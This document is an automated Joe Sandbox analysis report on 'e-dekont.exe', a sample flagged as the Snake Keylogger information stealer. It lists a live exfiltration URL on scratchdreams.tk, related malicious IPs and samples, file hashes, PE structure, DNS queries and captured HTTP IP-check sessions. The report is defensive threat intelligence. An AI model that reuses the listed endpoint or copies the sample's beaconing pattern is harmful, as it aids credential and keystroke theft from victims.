            https://scratchdreams.tk/_send_.php?TS | false | 14%, Virustotal; Avira URL Cloud: malware | unknown
                                  IP | Domain | Country | ASN | ASN Name | Malicious
                                  104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
                                  158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                  104.21.27.85 | scratchdreams.tk | United States | 13335 | CLOUDFLARENETUS | false
                                  Joe Sandbox version: 40.0.0 Tourmaline
                                  Analysis ID: 1430774
                                  Start date and time: 2024-04-24 07:08:16 +02:00
                                  Joe Sandbox product: CloudBasic
                                  Overall analysis duration: 0h 9m 16s
                                  Hypervisor based Inspection enabled: false
                                  Report type: full
                                  Cookbook file name: default.jbs
                                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed: 7
                                  Number of new started drivers analysed: 0
                                  Number of existing processes analysed: 0
                                  Number of existing drivers analysed: 0
                                  Number of injected processes analysed: 0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode: default
                                  Analysis stop reason: Timeout
                                  Sample name: e-dekont.exe
                                  Detection: MAL
                                  Classification: mal100.troj.spyw.evad.winEXE@3/1@4/3
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 211
                                  • Number of non-executed functions: 73
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  Time | Type | Description
                                  07:09:05 | API Interceptor | 9800589x Sleep call for process: e-dekont.exe modified
                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                  104.21.67.152 | rSyDiExlek.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | edlyEKgpaz.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | edlyEKgpaz.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | 58208 Teklif.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | Zarefy4bOs.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | SAT8765456000.xlam.xlsx | malicious | PureLog Stealer, RedLine, Snake Keylogger |
                                  104.21.67.152 | Purchase Order.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | Purchase Order.exe | malicious | Snake Keylogger |
                                  104.21.67.152 | 1d4D5ndo0x.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger |
                                  104.21.67.152 | D09876500900000H.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger |
                                  158.101.44.242 | Pnihosiyvr.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | PsBygexGwH.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | SAT8765456000.xlam.xlsx | malicious | PureLog Stealer, RedLine, Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | Purchase Order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | lxdriver_setup.exe | malicious | Agent Tesla, AgentTesla | checkip.dyndns.org/
                                  158.101.44.242 | Hitomi Downloader.exe | malicious | Agent Tesla, AgentTesla, RisePro Stealer | checkip.dyndns.org/
                                  158.101.44.242 | e-dekont.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | Payment_Draft_confirmation.xla.xlsx | malicious | Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | ATM Dekont E-Maili pdf.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
                                  158.101.44.242 | Halkbank_Ekstre_20240312_081829_752731.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                  checkip.dyndns.com | ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc | malicious | Snake Keylogger | 193.122.6.168
                                  checkip.dyndns.com | order.exe | malicious | Unknown | 158.101.44.242
                                  checkip.dyndns.com | 0FvHGK2cyk.exe | malicious | Agent Tesla, AgentTesla | 193.122.6.168
                                  checkip.dyndns.com | M0uVrW4HJb.exe | malicious | Agent Tesla, AgentTesla | 132.226.247.73
                                  checkip.dyndns.com | rSyDiExlek.exe | malicious | Snake Keylogger | 132.226.247.73
                                  checkip.dyndns.com | sample1.exe | malicious | SeclesBot, TrojanRansom | 132.226.247.73
                                  checkip.dyndns.com | UbMsBrTi5s.exe | malicious | Unknown | 193.122.6.168
                                  checkip.dyndns.com | Pnihosiyvr.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242
                                  checkip.dyndns.com | BmLue8t2V7.exe | malicious | Snake Keylogger | 132.226.247.73
                                  checkip.dyndns.com | gZIZ5eyCtS.exe | malicious | Snake Keylogger | 193.122.6.168
                                  scratchdreams.tk | rSyDiExlek.exe | malicious | Snake Keylogger | 172.67.169.18
                                  scratchdreams.tk | PsBygexGwH.exe | malicious | Snake Keylogger | 104.21.27.85
                                  scratchdreams.tk | 58208 Teklif.exe | malicious | Snake Keylogger | 172.67.169.18
                                  scratchdreams.tk | Zarefy4bOs.exe | malicious | Snake Keylogger | 104.21.27.85
                                  scratchdreams.tk | Remittance_copy.pdf.scr.exe | malicious | Snake Keylogger | 104.21.27.85
                                  scratchdreams.tk | Purchase Order.exe | malicious | Snake Keylogger | 104.21.27.85
                                  scratchdreams.tk | Fuy2BDS9W2.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger | 104.21.27.85
                                  scratchdreams.tk | Purchase Order.exe | malicious | Snake Keylogger | 104.21.27.85
                                  scratchdreams.tk | Purchase Order.exe | malicious | Snake Keylogger |
                                                      • 104.21.27.85
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.169.18
                                                      reallyfreegeoip.orgrSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSNew Order .docGet hashmaliciousUnknownBrowse
                                                      • 172.67.134.136
                                                      orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.84.67
                                                      DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.13.205
                                                      Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                      • 172.67.175.222
                                                      shipping docs.docGet hashmaliciousUnknownBrowse
                                                      • 104.21.74.191
                                                      Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.134.136
                                                      Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.152.117
                                                      purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      ORACLE-BMC-31898USSecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                      • 192.29.11.142
                                                      Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 193.122.130.38
                                                      ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      pGTQLD9ukH.elfGet hashmaliciousMiraiBrowse
                                                      • 193.122.239.120
                                                      pJNcZyhUh8.elfGet hashmaliciousMiraiBrowse
                                                      • 193.122.239.110
                                                      g2PqnVy6cQ.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 144.25.156.10
                                                      b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                                      • 168.138.235.164
                                                      order.exeGet hashmaliciousUnknownBrowse
                                                      • 158.101.44.242
                                                      KSRRrEMt1w.elfGet hashmaliciousMiraiBrowse
                                                      • 147.154.227.149
                                                      4QuhksnsA6.elfGet hashmaliciousUnknownBrowse
                                                      • 130.61.64.122
                                                      CLOUDFLARENETUSNew Order .docGet hashmaliciousUnknownBrowse
                                                      • 172.67.134.136
                                                      orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.84.67
                                                      DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.13.205
                                                      Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                      • 172.67.175.222
                                                      shipping docs.docGet hashmaliciousUnknownBrowse
                                                      • 104.21.74.191
                                                      Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.134.136
                                                      Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.152.117
                                                      purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                      • 104.21.67.152
                                                      https://docs.google.com/presentation/d/e/2PACX-1vTSXaY7ubI0TsmtDZGhnfi1zhnSxguMyu2LhG-ysNsdY7OPzg5AMGaTqcxwu9_JVEAMwiEcyOI9wHoz/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                      • 104.21.67.152
                                                      hRsK5gPX8l.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                      • 104.21.67.152
                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                      • 104.21.67.152
                                                      Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      3b5074b1b5d032e5620f69f9f700ff0eDAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      JUSTIFICANTE DE PAGO.vbsGet hashmaliciousUnknownBrowse
                                                      • 104.21.27.85
                                                      JUSTIFICANTE DE PAGO.vbsGet hashmaliciousUnknownBrowse
                                                      • 104.21.27.85
                                                      orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.27.85
                                                      FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                      • 104.21.27.85
                                                      DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      No context
Process: C:\Users\user\Desktop\e-dekont.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1415
Entropy (8bit): 5.352427679901606
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5: 3978978DE913FD1C068312697D6E5917
SHA1: 1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256: 33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512: 78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious: false
Reputation: moderate, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.306258701957308
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: e-dekont.exe
File size: 854'528 bytes
MD5: ff53d6a04ea8618890f7a81e31bd8a22
SHA1: d804959bcb8a2ea43278a1f78aac8abede4fa62f
SHA256: 5f8e6d5fd79a5a648e42597881ddf5e418be34a81b678b9742fad39d6b74c298
SHA512: fb1830954a5568b13448fc3326a66b7730081cc432aeca6de3cefde5b3ee7f44a9fe95c8d8ec53bbd293be3f931f0dcc890bf3c612593d07d897c6939cddce45
SSDEEP: 12288:WUF9WM9gnUHf/6JCh+bLNftlDcaxlCcjbAf:WU2M9gUHf/6tLTlYklCQbA
TLSH: 9E055DD1F1908C9AEC6B45F1BD2BA53024A7BE9C54A4810C569DBB1B76F3342209FE0F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..z..........^.... ........@.. .......................`............@................................
Icon Hash: aea4accc16a3d9be
Entrypoint: 0x48985e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xFFD1EFAD [Sun Jan 3 07:54:21 2106 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      xor al, 47h
                                                      inc ecx
                                                      inc edi
                                                      dec eax
                                                      inc ebp
                                                      xor eax, 484E3531h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [edx], dh
                                                      push esp
                                                      xor eax, 43433753h
                                                      xor al, 52h
                                                      cmp byte ptr [00000000h], dh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8980b | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8a000 | 0x48a9c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x87f54 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x87884 | 0x87a00 | 609fa1264cead6e51821cae68d6406cb | False | 0.956534418202765 | data | 7.955212716673103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8a000 | 0x48a9c | 0x48c00 | 7bcb8306eac410c29277665bf1a7daa8 | False | 0.06319802405498282 | data | 4.771389778446598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd4000 | 0xc | 0x200 | 9c9f291ae09cb1d0c331ef9ed0a8f644 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x8a2e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.1798780487804878
RT_ICON | 0x8a948 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2513440860215054
RT_ICON | 0x8ac30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.3918918918918919
RT_ICON | 0x8ad58 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3200959488272921
RT_ICON | 0x8bc00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.33664259927797835
RT_ICON | 0x8c4a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.2622832369942196
RT_ICON | 0x8ca10 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.04393141403083114
RT_ICON | 0xcea38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.18786307053941909
RT_ICON | 0xd0fe0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.2453095684803002
RT_ICON | 0xd2088 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3484042553191489
RT_GROUP_ICON | 0xd24f0 | 0x92 | data | | | 0.5753424657534246
RT_VERSION | 0xd2584 | 0x32c | data | | | 0.4273399014778325
RT_MANIFEST | 0xd28b0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 07:09:07.018888950 CEST | 192.168.2.4 | 1.1.1.1 | 0x733 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.731039047 CEST | 192.168.2.4 | 1.1.1.1 | 0x77ac | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:16.025978088 CEST | 192.168.2.4 | 1.1.1.1 | 0xde3f | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:17.037889957 CEST | 192.168.2.4 | 1.1.1.1 | 0xde3f | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 07:09:07.175024986 CEST | 1.1.1.1 | 192.168.2.4 | 0x733 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:09:07.175024986 CEST | 1.1.1.1 | 192.168.2.4 | 0x733 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.175024986 CEST | 1.1.1.1 | 192.168.2.4 | 0x733 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.175024986 CEST | 1.1.1.1 | 192.168.2.4 | 0x733 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.175024986 CEST | 1.1.1.1 | 192.168.2.4 | 0x733 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.175024986 CEST | 1.1.1.1 | 192.168.2.4 | 0x733 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.885088921 CEST | 1.1.1.1 | 192.168.2.4 | 0x77ac | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:07.885088921 CEST | 1.1.1.1 | 192.168.2.4 | 0x77ac | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:17.849466085 CEST | 1.1.1.1 | 192.168.2.4 | 0xde3f | No error (0) | scratchdreams.tk | | 104.21.27.85 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:17.849466085 CEST | 1.1.1.1 | 192.168.2.4 | 0xde3f | No error (0) | scratchdreams.tk | | 172.67.169.18 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:17.849488020 CEST | 1.1.1.1 | 192.168.2.4 | 0xde3f | No error (0) | scratchdreams.tk | | 104.21.27.85 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:09:17.849488020 CEST | 1.1.1.1 | 192.168.2.4 | 0xde3f | No error (0) | scratchdreams.tk | | 172.67.169.18 | A (IP address) | IN (0x0001) | false
                                                      • reallyfreegeoip.org
                                                      • scratchdreams.tk
                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:09:07.349437952 CEST | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
Apr 24, 2024 07:09:07.515300989 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
Apr 24, 2024 07:09:07.519253016 CEST | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
Apr 24, 2024 07:09:07.691046953 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
Apr 24, 2024 07:09:08.871567011 CEST | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
Apr 24, 2024 07:09:09.037977934 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.4 | 49737 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Apr 24, 2024 07:09:09.917876959 CEST | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:10.082788944 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:10 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.4 | 49740 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Apr 24, 2024 07:09:10.959810972 CEST | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:11.125665903 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Apr 24, 2024 07:09:11.999416113 CEST | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:12.165287971 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
